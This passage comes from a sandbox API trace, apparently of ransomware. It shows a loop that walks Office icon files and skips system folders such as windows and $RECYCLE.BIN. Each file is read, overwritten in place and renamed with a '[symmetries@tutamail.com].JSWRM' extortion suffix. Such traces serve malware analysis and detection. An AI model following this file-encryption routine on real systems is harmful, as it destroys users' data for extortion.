lstrcmpiW (lpString1="SessionMember.ico", lpString2="perflogs") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="documents and settings") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="system volume information") returned -1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="msocache") returned 1 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionMember.ico", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionMember.ico", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SessionMember.ico", lpUsedDefaultChar=0x0) returned 17 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionMember.ico", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionMember.ico", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SessionMember.ico", lpUsedDefaultChar=0x0) returned 17 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionMember.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionmember.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.020] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.020] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.020] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.022] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.022] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.022] CloseHandle (hObject=0x314) returned 1 [0132.022] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionMember.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionmember.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionMember.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionmember.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.023] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9f6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="SessionOwner.ico", cAlternateFileName="SESSIO~2.ICO")) returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2=".") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="..") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="...") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="windows") returned -1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="recovery") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="perflogs") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="documents and settings") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="system volume information") returned -1 [0132.023] lstrcmpiW (lpString1="SessionOwner.ico", lpString2="msocache") returned 1 [0132.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionOwner.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionOwner.ico", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SessionOwner.ico", lpUsedDefaultChar=0x0) returned 16 [0132.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionOwner.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SessionOwner.ico", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SessionOwner.ico", lpUsedDefaultChar=0x0) returned 16 [0132.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionOwner.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionowner.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.025] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2550) returned 1 [0132.025] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.025] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0x9f0, lpOverlapped=0x0) returned 1 [0132.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.026] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0x9f0, lpOverlapped=0x0) returned 1 [0132.026] CloseHandle (hObject=0x314) returned 1 [0132.027] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionOwner.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionowner.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SessionOwner.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\sessionowner.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.027] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x69980f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69be349, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="SpaceSelector.ico", cAlternateFileName="SPACES~1.ICO")) returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2=".") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="..") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="...") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="windows") returned -1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="recovery") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="perflogs") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="documents and settings") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="system volume information") returned -1 [0132.028] lstrcmpiW (lpString1="SpaceSelector.ico", lpString2="msocache") returned 1 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SpaceSelector.ico", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SpaceSelector.ico", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpaceSelector.ico", lpUsedDefaultChar=0x0) returned 17 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SpaceSelector.ico", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SpaceSelector.ico", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpaceSelector.ico", lpUsedDefaultChar=0x0) returned 17 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SpaceSelector.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\spaceselector.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.029] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.029] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.029] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.030] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.031] CloseHandle (hObject=0x314) returned 1 [0132.031] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SpaceSelector.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\spaceselector.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\SpaceSelector.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\spaceselector.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.032] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf073ddf4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf073ddf4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="StatusAway.ico", cAlternateFileName="STATUS~1.ICO")) returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2=".") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="..") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="...") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="windows") returned -1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="recovery") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="perflogs") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="documents and settings") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="system volume information") returned -1 [0132.032] lstrcmpiW (lpString1="StatusAway.ico", lpString2="msocache") returned 1 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusAway.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusAway.ico", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusAway.ico", lpUsedDefaultChar=0x0) returned 14 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusAway.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusAway.ico", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusAway.ico", lpUsedDefaultChar=0x0) returned 14 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusAway.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusaway.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.033] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.033] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.035] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.035] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.035] CloseHandle (hObject=0x314) returned 1 [0132.035] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusAway.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusaway.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusAway.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusaway.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.036] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41f3e26, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41f3e26, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="StatusDoNotDisturb.ico", cAlternateFileName="STATUS~2.ICO")) returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2=".") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="..") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="...") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="windows") returned -1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="recovery") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="perflogs") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="documents and settings") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="system volume information") returned -1 [0132.036] lstrcmpiW (lpString1="StatusDoNotDisturb.ico", lpString2="msocache") returned 1 [0132.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusDoNotDisturb.ico", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0132.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusDoNotDisturb.ico", cchWideChar=22, lpMultiByteStr=0x2411c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusDoNotDisturb.ico", lpUsedDefaultChar=0x0) returned 22 [0132.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusDoNotDisturb.ico", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0132.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusDoNotDisturb.ico", cchWideChar=22, lpMultiByteStr=0x240fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusDoNotDisturb.ico", lpUsedDefaultChar=0x0) returned 22 [0132.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusDoNotDisturb.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusdonotdisturb.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.038] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0132.038] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.038] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0132.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.039] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0132.039] CloseHandle (hObject=0x314) returned 1 [0132.040] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusDoNotDisturb.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusdonotdisturb.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\StatusDoNotDisturb.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\statusdonotdisturb.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.046] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="StatusOnline.ico", cAlternateFileName="STATUS~3.ICO")) returned 1 [0132.046] lstrcmpiW (lpString1="StatusOnline.ico", lpString2=".") returned 1 [0132.046] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="..") returned 1 [0132.046] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="...") returned 1 [0132.046] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="windows") returned -1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="recovery") returned 1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="perflogs") returned 1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="documents and settings") returned 1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="system volume information") returned -1 [0132.047] lstrcmpiW (lpString1="StatusOnline.ico", lpString2="msocache") returned 1 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusOnline.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusOnline.ico", cchWideChar=16, lpMultiByteStr=0x2413a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusOnline.ico", lpUsedDefaultChar=0x0) returned 16 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusOnline.ico", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StatusOnline.ico", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StatusOnline.ico", 